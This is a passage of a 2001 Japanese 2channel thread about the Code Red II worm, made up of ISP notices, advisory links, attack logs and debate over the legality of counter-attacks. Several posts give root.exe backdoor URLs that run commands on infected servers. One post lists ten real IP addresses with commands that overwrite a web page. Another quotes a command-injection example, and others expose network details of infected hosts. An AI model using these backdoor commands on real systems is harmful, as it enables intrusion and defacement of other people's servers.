活動期限を書き換えた変種くらい余裕で登場しそうだが…。

475 :名無しさん@お腹いっぱい。:2001/08/06(月) 07:29
@NetHomeからのお知らせ

<通信中以外にも、ケーブルモデムのランプが点滅するという現象について>

こちらの症状の原因は、【Code Red ワーム】というウィルスの影響と関連がある可能性がございます。
しかし、【Code Red ワーム】は一般のユーザー様には全く被害がございません。

● Code Red ワーム 対象のマシン
Windows NT 4.0 で IIS 4.0 および Index Server 2.0 がインストールされているマシン
Windows 2000 で IIS 5.0 および Indexing service がインストールされているマシン
Windows XP β版 で IIS 5.0 および Indexing service がインストールされているマシン

● IIS を実行している以下の製品
Cisco CallManager
Cisco Unity Server
Cisco uOne
Cisco ICS7750
Cisco Building Broadband Service Manager
Cisco 600 シリーズ DSL ルータ

弊社サービスは、サーバー利用、ルーター利用共に禁止とさせて頂いておりますので
弊社サービス利用規約に基づいて、Jcom@Nethomeをご利用のお客様への影響はございません。

尚、既に【Code Red ワーム】に感染していると思われたお客様には8月5日に
注意を促すメールを送らせて頂きました。
【Code Red ワーム】に感染されているお客様は早急に対処のほどをお願い致します。

476 :名無し:2001/08/06(月) 07:49
他の板の人にも注意した方がいいよな。
初心者ばかりみたいだし。

Web制作
レンタル鯖
WebProg
初級ネット
セキュリティ
通信技術
プロバイダー

477 :名無しさん:2001/08/06(月) 07:50
>>476
通信技術はこっちよりもレベル高いとおもわれ

478 :名無し:2001/08/06(月) 07:55
初級ネットで
ゾーンアラームがさー  
ってスレッド立ってます。

479 :感染しました。:2001/08/06(月) 07:58
すみません。
ARIS Analyzer Service ってなんなのかわかる方いたら教えてください。
なんで、WAKWAKから直接じゃなくて、ここから警告がくるんだろう??

480 :名無しさん:2001/08/06(月) 08:03
Code Red II 関係情報リンク
かなり最新情報もまじってます

http://www.incidents.org/diary/diary.php
http://slashdot.jp/article.pl?sid=01/08/05/0441253&mode=nested
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26list%3D1%26mid%3D201886%26threads%3D0%26end%3D2001-08-11%26start%3D2001-08-05%26
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26list%3D1%26mid%3D201885%26threads%3D0%26end%3D2001-08-11%26start%3D2001-08-05%26
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Fend%3D2001-08-11%26list%3D82%26mid%3D201879%26threads%3D0%26start%3D2001-08-05%26fromthread%3D0%26
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=178
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=496
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=386
http://www.geocrawler.com/lists/3/SourceForge/4890/0/6330369/

481 :感染しました。:2001/08/06(月) 08:16
なんだこの板は、住人がみんな冷たいんだな。
つーか、誰も知らないだけか。

482 :名無しさん@お腹いっぱい。:2001/08/06(月) 08:42
>>481
プロバイダからのメールにURLがあったろ。そこ読めや。

483 :名無しさん@お腹いっぱい。:2001/08/06(月) 09:22
ずっとログを取ってるんだけど、1分に一回はしかけて来るよ。
うざくて仕方ない。
なぜかzaqが多いんだけど。

484 :名無しさん@お腹いっぱい。:2001/08/06(月) 09:44
GET 〜〜 HTTP/1.*

っていうアクセスに対し、

DELETE 〜〜 HTTP/1.0

っていうレスポンスを送信元に返すハニーポット
書いて置いとけばどうだろうと思ったけど、DELETE
メソッドは認証が必要なんだよね・・・

485 :名無しさん@お腹いっぱい。:2001/08/06(月) 10:27
ま、要するにIISインストールしてある人は
これ↓を入れて再起動すればオッケーなんでしょ?
http://www.microsoft.com/japan/technet/security/codealrt.asp

486 :名無しさん@お腹いっぱい。:2001/08/06(月) 10:34
>>485
そうなんだけど、新種のX型はバックドアとIEのトロイが残っちゃうみたい

487 :名無しさん@お腹いっぱい。:2001/08/06(月) 10:41
>>486
それを取り除くには、どうしたらいいの?

488 :名無しさん@お腹いっぱい。:2001/08/06(月) 10:47
/scripts/root.exe?/c+dir+"c:\"
/c/winnt/system32/cmd.exe?/c+dir+"c:\"
藁?

489 :名無しさん@お腹いっぱい。:2001/08/06(月) 11:24
今日はすごい回数くる…

490 :ネットフーカー:2001/08/06(月) 11:28

                              ―― ̄ ̄ ̄ ̄\
                            /          \
                             |      人    |
                            |   //|/|/  \    \
                             ||\|へ  ー― \    |
                                || ̄|-| ̄ ̄|― L  |<パケットがゴミのようだ
_                              | ̄| ̄ ̄    | /
| |\_____                      | ___   / /
(●)__    |DΞ)|                    |       /|/
  ̄  \\―|DΞ)|_                     |___/  |
      \\_|DΞ)ノ)     __―――――――|`―_   _|__
    ( ̄| | D|  |◇ノ ̄ ̄ ̄ ̄        |    \   ̄|_//   ―_
     ( ̄ ̄  ̄ ̄) |               \   / \ / \\_ /   ―-
      (  ̄ ̄ ̄)| |                \/    / | \\/     ヽ
      (_ ̄ ̄) / |                /    /  |    \      |
       |_| ̄ ̄//                 \    /    |      |      |
       | |_//                   \ |__ |      |       |
       |__/__                   \/ /  ̄|つ   /    |   |
             ̄ ̄ ̄ ̄ ̄ ̄ ̄| ̄ ̄/     //    し― ̄      |   |

491 :反撃は解決には。:2001/08/06(月) 11:32
>>484

場合によっては自分が訴えられる可能性があるのでよしましょう。

492 :名無しさん@お腹いっぱい。:2001/08/06(月) 11:47
そのバックドアやらトロイを使って、自分にパッチとワクチン当てて
リブートしてしまうという、乳酸菌のような善玉ウィルス希望

493 :名無しさん@お腹いっぱい。:2001/08/06(月) 11:53
なんか、同じヤツが一度に何十回も要求出してくるタイプがだんだん増えてきてない?

494 :名無しさん@お腹いっぱい。:2001/08/06(月) 11:55
四万テクに出ましたね。危険度4でいつのまにかVer.3になってる

http://www.symantec.com/region/jp/sarcj/data/c/codered.v3.html

495 :名無しさん@お腹いっぱい。:2001/08/06(月) 12:03
>>491
バックドアだけでも消してあげれば、って思ったんだけど、
そもそも無理だったから…

>>493
増えてるかも。1分間に10回以上同じ所から来たりする。
意味無いじゃんって気もするが

496 :名無しさん@お腹いっぱい。:2001/08/06(月) 12:04
>>493

48発

IP: 211.250.76.163
Node: WEBSER
NetBIOS: IS~WEBSER
Group: SONGGOKMS
MAC: 00010290C057
DNS: WEBSER

497 :名無しさん@お腹いっぱい。:2001/08/06(月) 12:31
状況把握が数日分遅れているかもしれないNEWS

http://www.zdnet.co.jp/news/0108/06/e_worm.html

498 :名無しさん@お腹いっぱい。 :2001/08/06(月) 12:36
当然感染者サーチして ****.exe使って設定甘々のガバガバにする
ツールとかも有るんでしょうね、、、、
で、こんどはそっちの覗きが来ると   うざー

499 :インターリンク撃沈:2001/08/06(月) 12:44
http://www.interlink.or.jp/notification/backno/2001/trb029.html

500 :名無しさん@お腹いっぱい。:2001/08/06(月) 12:51
>>498
ハニーポット作りがいがあるよ(w

501 :配下に限らず:2001/08/06(月) 13:06
とうとうお前もか、
ntsrv02.onc.ne.jp - - [06/Aug/2001:08:13:05 +0900]
おのれは やっちゃだめだろう? はぁ〜

502 :名無しさん@お腹いっぱい。:2001/08/06(月) 13:13
一瞬OCNかとおもたある

503 :( ´Д`):2001/08/06(月) 13:36
p09-dn01simabara.nagasaki.ocn.ne.jp - - [06/Aug/2001:13:27:47 +0900] "GET /defau
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXTTP/1.0" 404 282 "-" "-"

ドッカドッカくるよぅ・・・
回線細いんだからやめてくれ!!

504 :491:2001/08/06(月) 13:48
>>495
御意。真似厨房が多発しては困ると思っただけなんで。
#亀レスすまん。

505 :名無しさん@お腹いっぱい。:2001/08/06(月) 13:55
http://www.zdnet.co.jp/news/bursts/0108/06/symantec.html
http://www.symantec.com/region/jp/sarcj/data/c/codered.v3.html

506 :Zdnet:2001/08/06(月) 14:27
>>502
すまん、OCNかとオモテ書いた。
でも管理者さんのメールアドレスはocnどめいんだったぞい。
オーエヌシーかぁ。

507 :名無しさん@お腹いっぱい。:2001/08/06(月) 14:27
自宅のケーブルモデムが頻繁に点滅するようになったので心配してたんだけど、
休日明けで会社のサーバのログ見たら驚き。
4日から増え初めて5日、6日は数分おきにきてるよ。
Apacheなんで安心、なんて言ってられなくなってきたような。

508 :あ、:2001/08/06(月) 14:33
IISがどうのとか言う前に
Apacherとしてはイヂメに近いモノがあるな。
IISだけに飛んで欲しかったYO。

509 :名無しさん@お腹いっぱい。:2001/08/06(月) 14:50
ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:ここんところ、アタック急増!> Code Red:

510 :名無しさん@お腹いっぱい。:2001/08/06(月) 14:50
試しにやってみた

マジでプロンプト出る・・・・

511 :名無しさん@お腹いっぱい。:2001/08/06(月) 14:51
試しにやってみた
マジでプロンプト出る・・・

512 :名無しさん@お腹いっぱい。:2001/08/06(月) 14:56
そりゃ出るだろうよ

513 :厨房:2001/08/06(月) 14:58
dir ってやってみたら、反応なし

514 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:03
変わったお名前のお客様
DARKMAN
STORMBLADE
HERO
DEVILLEO
SUPERCOMPUTER

スパコンって、あんた…

515 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:06
IP: 211.44.11.76
NetBIOS: GOLDBODY
Node: GOLDBODY
Group: NI
MAC: 00A0C92C7D9E
DNS: IS~GOLDBODY

516 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:10
>>515
飲んでたコーヒー吹き出しちゃったよ

517 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:29
IP: 202.250.238.144
Node: INFOED
NetBIOS: __MSBROWSE__
Group: 獨協医科大学
MAC: 006094EA5479
DNS: infoed.dokkyomed.ac.jp

「どっきょう」て読むのか・・。
大学のサーバーも侵食されまくってるって事か。
ところで
ttp://202.250.238.144/Room/Room.html
マルチメディア教室(Macintosh)てなんのためにあるの?

518 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:32
このままだとやばいです、ただでさえ、回線細いのに・・・。
定額制なのが、唯一の救いか・・。
おいらのサーバーにコードレッド来まくりです。
OSはFreeBSDです。
8/1 21:41記念すべき初訪問。この日は1件。
8/2 23件の訪問 まだまだ序の口。
8/3 24件の訪問 活動一時休止?
8/4 34件のご訪問 深夜になって、急激に活動再開。
8/5 201件 ついに爆発、深夜サーバー止まる。すぐに復旧させたけど・・。
8/6 145件 14時までのログ。このままだと、300件いきそう。
このまま増え続けると、XDAYが近づいてきました。
私は、定額制だからいいけど、従量制の人は、このままだと、即死しますね。
ここにIP晒し上げたいけど、倫理上しません。

519 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:50
ひろゆきんところはどうなんだろう。

520 :名無しさん@お腹いっぱい。:2001/08/06(月) 15:57
やばい
すっげーやばい
dir実行できちゃった

521 :また変種?:2001/08/06(月) 16:01
Code Redに混じって、UDPポート3897のスキャンがくるようになった。
これって、トロイ起動?なんだろ?

Code Red I/IIの影に隠れて別のが動いてるのかと思ったけど、HTTP probeした
と同じホストから来ているが・・・

61.74.223.145
61.220.68.101
ftp.tvzone.co.kr

あ、同じプロバイダ(INFOWEB)からもきた。どんどん。
やはりワームっぽい。

522 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:04
>>520
通報しときました

523 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:07
>>520

dirってプロンプトでフォルダ内を見る時に使うやつ?
実行出来るとヤバいの?
教えてくれ〜

524 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:12
CGIサンプルのバッチファイルを利用したセキュリティホール
1999/10/21, The Shadow Penguin Security 代表 UNYUN さんによる指摘
対象バージョン: Version1.20cとそれ以前

例:
http://localhost/cgi-bin/input.bat?|dir
によって dir が実行される。

解説: input.bat で、
echo QUERY_STRING=%QUERY_STRING%
の実行時、まず、
echo QUERY_STRING=|dir
と変更されてから実行されるため、 QUERY_STRING= を出力後 dir が実行される。
同様に任意のコマンドが実行可能。
echo QUERY_STRING="%QUERY_STRING%"
としても、
http://localhost/cgi-bin/input.bat?"|dir"
とすると、
echo QUERY_STRING=""|dir""
となるので、
QUERY_STRING="" を出力後 dir"" が実行される。


対策: Version 1.20d (1999/10/23)

525 :520:2001/08/06(月) 16:13
>>523
任意のコマンドが外部から実行できちゃうって事
すげーやばい

洒落ならないんで警告メッセージ含んだゴミコマンド実行だけで止めておいた

526 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:17
>>524
それってAnHTTPDの話だろ
今、関係あるのか?

527 : :2001/08/06(月) 16:20
祭りだ、祭りだ、ワッショイワッショイ

528 :523:2001/08/06(月) 16:21
>>524-525
ありがと。
ちなみに、これってNTの事だよね?
アホですまん・・・。

529 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:33
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

530 :サイトが逝ってますか?:2001/08/06(月) 16:37
>>529
アクセスできませんが、サイトが逝ってます?
それとも、踏まされた!?(ToT)/

531 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:37
>>530
落ち着け
見れるし普通のページだ

532 :名無しさん@お腹いっぱい。:2001/08/06(月) 16:43
>>529 すげー、システム再インストールか。Code Red II に
レジストリいじられてるならしゃぁないか。
まぁオイラには対岸の火事だけど。

533 :530:2001/08/06(月) 16:44
Xの解説っす
ブラクラじゃないっす(汗

534 :529だった:2001/08/06(月) 16:47
宇津氏‥

535 :530:2001/08/06(月) 16:48
>>531
さんきゅう。どっか混雑してる酔うで回復待つ。

536 :530:2001/08/06(月) 16:58
FreeBSDでつなぎなおしたら見えた。
WindowsのPPPoEのMTU設定がDQNだったと思われ、陳謝。

でも、レジ巣鳥改ざん=システム再インスト、というのは短絡ではないかなあ。
中身、ちゃんと見て書いたんだろか。SecurityFocusの逆アセでも確認するし
かないけど。

#漏れの中ではレジ巣鳥=ただの設定データベース。

537 ::2001/08/06(月) 16:59
ウチが借りてるレンタルサーバのログにも
XXXXXXやらNNNNNNNやらが大量に残ってました。
でもUNIXサーバのはずなんだけどなあ。
UNIXでも感染はしないけど攻撃だけは受けるということ?

538 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:02
Code Red は無差別攻撃です。

539 :しにしに:2001/08/06(月) 17:03
Security Focusの記事(480参照)だと、

1) Sets SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\SFCDisable to 0FFFFFF9Dh
(disables system file protection)
2) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\Scripts to ,,217
3) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\msadc to ,,217
4) Sets SYSTEM\CurrentControlSet\Services
\W3SVC\Parameters\Virtual Roots\c to c:\,,217
5) Sets SYSTEM\CurrentControlSet
\Services\W3SVC\Parameters\Virtual Roots\d to d:\,,217

仮にこれと、cmd.exe, explorer.exeだけなら・・・

(2)〜(5)は、IISの管理GUIで直せるし、(1)は他人のマシン見て直せるし、
再インストールいらない気が (^_^;

540 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:05
>>539 それすら出来ない連中が今回の犠牲者だ。

# 犠牲者というかタコな鯖缶というか...

541 :&hearts@537:2001/08/06(月) 17:07
>>538
UNIXの場合は、その様に攻撃ログが多数残されていても
特に対処しなくても(つまり無視する)大丈夫なのですか?
当方、詳しくないもので。

542 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:15
http://202.228.147.131/code_red_receive.html

2分間に57発も打ち込まれましたが、上記のようにすれば
IISにエラーとかのログが残りますか?

543 :名無しさん@お腹いっぱい。 :2001/08/06(月) 17:17
無視したくても、このまま増加し続けると、無視できないような・・。

544 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:17
>>540

同意。

んでも、
Win2kではデフォでIIS入っちまうし(Proもだっけ?)、HPの仕上がりを自分のPCで検証
する程度の理由で使ってたり、IISって何?て言ってる人にも感染しちまうんですねえ
・・・

この騒動、収束が見えない気が・・・鬱。

545 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:21
>>541

CodeRed I/IIに関しては問題ないです。
隠れ蓑して別のアタックがあるかもしれないしで、既知のパターンを
除外して残りを監視しとけば、十分では。

546 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:21
>>541
Code Red に関しては、今のところ大丈夫みたいでっせ

547 :521:2001/08/06(月) 17:24
>>521

自己フォロー。今度はUDPポートが3897じゃなく4345のが来ている。
何種類もあるみたい。

ちなみに、トロイ→Backdoorの誤り。恥じ。

548 :537=541:2001/08/06(月) 17:24
>>545
>>546
サンクス。安心しました。

549 :怖い:2001/08/06(月) 17:39
http://202.250.238.XXX/scripts/root.exe?/c+dir+"c:\"
怖いね

550 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:41
おーい これ以上それ書くと子供がそこらに貼り出すぞー
大人ならそゆことするなそ。

551 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:43
(゚Д゚)!!

552 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:46
http://202.250.238.XXX/scripts/root.exe?/c+dir+"c:\"

553 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:50
あー、オイラ黙ってたのに...

554 : :2001/08/06(月) 17:51
http://news.yahoo.co.jp/headlines/sbn/010806/cpt/16430000_zdnet003.html
コードレッド3登場!

555 :名無しさん@お腹いっぱい。 :2001/08/06(月) 17:52
これってFormatとかもできるの?

556 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:53
>>554
なぜか CodeRed v3 になってるけど、中身は CodeRedII の解説だよ。

557 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:53
>>554

どうせならダュシュとかTURBOとかZEROにして欲しかった。

558 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:55
言うまでもないが、バックドア突くのも犯罪だ。
やめとけよ。

559 :名無しさん@お腹いっぱい。:2001/08/06(月) 17:59
気付いたときに逆ギレして被害者ヅラして怒りのハケ口として
バックドアに入って来た奴だけを吊し上げるだね?

560 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:00
ネタにまどわされずに参りましょう。

561 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:02
バックドアから侵入して対策パッチを当ててあげるのも
やっぱ犯罪ですかね? いや、オレはやらないけど。

562 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:07
メールボックス覗いて関係者にメリッサ送ってやんのが親切かと。

563 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:08
串使えよ。

564 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:11
interlinkからメールが2度来た。完全泣きが入ってる。

ZOOTサービスユーザ様 各 位
いつもインターリンクをご利用ありがとうございます。
 2001.08.02より続いております、関東地区ZOOTサービス速度障害について大変ご迷惑
おかけいたしております。通信速度の低下の一因としまして、『Code Red』に感染した
IISサーバより、大量のパケットが放出され,ネットワークトラフィックの混雑を引
き起こしていることがわかりました。『Code Red』の詳細は、次のURLを参照くだ
さい。
→ http://www.zdnet.co.jp/news/0108/03/e_codered.html

 そこで、IIS4、及び5を稼動中のユーザ様は、ご自身のサーバのチェックをお願い
申し上げます。検査ツールは、次のURLをご参照ください。
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20010721/2/

 いづれにしましても、至急セキュリティパッチは必ず当ててくださいますようよろしく
お願い申し上げます。セキュリティパッチは、次のURLをご参照ください。
http://www.microsoft.com/TechNet/itsolutions/security/topics/codeptch.asp

 お手数ですが、対象のユーザ様は至急ご確認の上対処の程よろしくお願い申し上げます。

 尚、本件ついてのお問合せで、電話が大変混雑しております。お手数ですが、次のメール
アドレスへご連絡くださいますようご了承願います。
(サポートのメアド)

565 :520:2001/08/06(月) 18:12
あ〜貼っちゃったヤツいるのか・・・
これじゃ祭り開催決定だな

566 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:13
>>>563
串って、感染してるIP閉じるために使うの?
基本的に、一回スキャンかけたIPには来ないみたいですよ。
それ以前に、1時間に何十件と来てるのに、ぜんぶチェックしきれないって。

port80閉じたらいいんだけど、そうはいかない・・・

567 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:14
>>561
まずいんじゃないですかね。
人の計算機の不法使用ということになり。

相手に事情が理解され、訴えられなければOKの可能性もなきにしもあらず
ですが、説明できる根拠を整え、相手も説明を聞く耳があると想定するのは、
手間もリスクも大きすぎます。危うきには手を出さず、ですね。

今回ばかりは、プロバイダが主体的に解決に参加しないとどうにもならない
かも(鯖立ててるという意識すらない感染例が相当あると思われ。)

568 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:20
>>567
ニュースで「家庭で使われているPCには関係ない」って言ってた。

569 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:22
>>568
MSの定義では、「Windows2000は、家庭用PCのOS」ではないのです。
という以外に根拠のないニュースゆえ。
パッチ当ててないIISが動作してて、80番をルータとかでふさいでない限り一緒。

570 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:23
>>568
嘘言うな。
不正使用には変わらん。

571 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:36
大震災後の水道、ガス、電気の復旧作業と同じかな。
一旦プロバイダの大元でport80を完全に閉じる。
一軒一軒安全を確認してからport80を開く。
駄目だ、気の遠くなるような作業だ(藁

572 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:39
こんな状態のまま照れ穂突入
どうなるんでしょ

573 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:50

http://www.jpcert.or.jp/at/2001/at010019.txt

574 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:51
>>570
ばれなきゃ問題なし。

code redに感染したヴォケのせいで障害が発生してるのであるから、
root.exe叩いて落すのは緊急避難。 (かなり無理あり 笑)

575 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:57
漏れ、ダイアルアップ陣まで感染してる時点で、もう個人個人でどーのこーのっていう話は終わってると思う
いくらニュースで言ってたって自分の事だと思わないぜきっと

576 :570:2001/08/06(月) 18:59
>>574
俺もブチ落としてやりたいのは一緒なんだってば。

とりあえずプロバイダに連絡入れまくって、その IP 緊急措置
として切り離せというのが精一杯。
でも CodeRed 騒ぎ自体を知らない管理者がいるプロバイダが
多くてマジで切れそう。

577 :名無しさん@お腹いっぱい。:2001/08/06(月) 18:59
MSは早く、ウィンドウズアップデートの重要な更新でパッチを配ればいいのに。

578 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:04
今日暴れてる code red II は、土日に感染した奴だよね。
週明けの今日に感染して潜伏してるのが明日騒ぎ出すとか
考えると鬱だ。

579 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:21
>>574

とりあえず突っ込んでおくと、
root.exeは単にbackdoorなので、感染を止めるには・・・リ(検閲)−トしないと。
リ(検閲)−ト用に、root.exeは残しておきましよう。

というか、多分、そんなことをしても間に合わないくらい広がっているので、
無駄な抵抗だし、サイト管理者か上流プロバイダにゴラアと文句つけて、
切断するか直すかしてもらうしかないですね。

580 : :2001/08/06(月) 19:25
 Code Red II の目的は裏口を作ることじゃなくて、
使うことなんだよね? だけど感染したマシンの
情報を、どこかに送る機能は無いみたいだ。とい
うことは、Code Red II が作った裏口に入り込む別
のワームが近々登場するってことだろうか?

 ま、「入り口は俺が作った。後は自由行動とする」
というのもありかもしれないが。

581 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:25
火事の時は他人の家でも窓割って入って良いというのはこの場合
適用されんのか?

582 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:29
無印Code Redのつもりで「パッチあててリブートすればもう安心!」
と思ってるヤツら多そう・・・。

583 :名無しさん@お腹いっぱい。 :2001/08/06(月) 19:29
http://210.127.44.165/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://210.75.132.10/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://203.253.161.101/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://203.253.15.156/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://61.136.9.32/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://61.117.53.228/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://202.207.146.50/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://202.98.82.66/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://165.76.123.181/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm
http://165.76.87.36/scripts/root.exe?/c+echo+^<html^>boo^</html^>>../AdminScripts/index.htm

584 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:31
↑やめれ。

585 : :2001/08/06(月) 19:30
SIIのやつネットから切り離してくれよ。
なんとかならないの?

#うち回線細んでやばいっす。

586 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:34
>>583
入り口?

587 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:34
>>583 そゆのは半角板の方が効果的と思われ

588 :484:2001/08/06(月) 19:34
>>484みたいなことしなくても、リクエストが来たら、
その鯖に自動でGET /scripts/***送ってログインして
moveでリネームとかattribで実行権カットとかやって、
最後にrundll.exe ****みたいなことしてやるハニーポット
作るかなって思ったけど、犯罪になりそうなのでやめとく

どうでもいいけど、昨日J-COMにログ添付メール送ったら
お礼のメールが届いてた。

589 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:35
前例主義の国だし、難しいかと。

たとえば、隣の家の木の葉が舞い込んできて苦情をのべてもどうにも
ならないんで、入って切ったら家宅不法侵入てのもあるし。

緊急性の説明が、相手に伝われば問題にならない「可能性」はある
けど、まず当事者との連絡・確認の努力をしてないと、主張が弱くな
るし、相手が納得しないのだと、やはりトラブルになりまっせ。

こんだけたくさんWormが発生するのに、個々人で当事者との連絡・
確認努力は既に不可能→プロバイダなんとかせい、(切断、フィルタ、
連絡せい)としか言えんのではないかと思います。

590 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:35
>>586 クリックすると相手のサイトが改竄される。君がやらなくても
いずれ google 君や lycos 君が上のリンク拾って改竄される。
2ch って robot.txt 使ってるんだっけ?

591 : :2001/08/06(月) 19:36
>>585
IISでした。すまそ。
鬱出し脳。

592 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:38
>>582
II にしても、root.exe, explorer.exeは仕掛けられ, レジ巣取はいじられだが、
ひとまずリブートのみでワーム自体は居なくなるのではなかったか?

593 : :2001/08/06(月) 19:38
ここはエンコも知らないアホの吹き溜まりです ┐(´ー`)┌

594 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:47
>>592
ワームは居なくなるけど穴は開いたままなので
遅かれ早かれ再感染

595 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:49
>>580

今日の昼になってから、HTTPアクセスのあとにbackdoor探しのUDPスキャンを
ペアでやってくるお方が多いので、現にそうなってる気が。

観察したポート。1143, 4345, 3897, 1188
とはいえ、ポート番号はいくらでも選べるだろうが、完全ランダムじゃないようだ。
感染者のIPアドレスと相対なのか?

なんにしてもHTTP, SYNではじいて蹴ってしまってて、root.exe等が送り込まれる
前に撃退してるので、ウラが取れないんだけど。

596 :名無しさん@お腹いっぱい。:2001/08/06(月) 19:50
>>594
理解。その点は初代と同様ね。

597 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:09
しかし Code Red が駆逐されたらまた1日数十アクセスに戻ってしまう…。
Code Red マンセー

598 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:32

今ごろ遅いぜ、日経BP

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010806/1/

599 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:33
>>595
バックドア便乗して何か植付けに来るアクセス、今日の昼から時々来てるよ。

600 :名無しさん@お腹いっぱい。 :2001/08/06(月) 20:34
一番怖いのが、ルータのエンジンにIISを使っているのが、管理者も気づかないので、
すごく怖い。

最近のciscoとか特にやばい。

601 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:36
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20010731/5/

> しかしコンピュータ・ウイルス専門家のRob Rosenberger氏は,
> FBI NIPCが警告を発したことに対し,「FBIはパニックを引き起こそう
> としている」と非難。「Code Redの脅威は深刻に受けとめるべきだが,
> パニックに陥ったユーザーはCode Redと同じくらい危険だ」(同氏)と
> 述べている。

古い記事だけど、FBIは正しかった。しかしこのおっさんもある意味
正しい。パニックに陥ったユーザーというか、F○厨ってやつが・・・

602 :600:2001/08/06(月) 20:38
参考URL
http://www.jpcert.or.jp/at/2001/at010014.txt

603 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:46
>>602
これ、ルータのエンジンではなくて、管理装置(たぶんパソコン搭載)のよ〜に見えるん
ですが。(やばいことには変わりないケド)

604 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:47
カンコ君も困ってる
http://www.kornet.net/openboard/nktnews/010806.html
たぶん

605 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:51
うむ、言ってる事はわからんが、とりあえず困ってそうだ

606 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:53
http://www.security.nl/misc/codered-stats/
時間と共に悪化してるな

http://www.security.nl/misc/codered-stats/geodist.gif
東アジア崩壊中(笑)

607 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:55
>>606
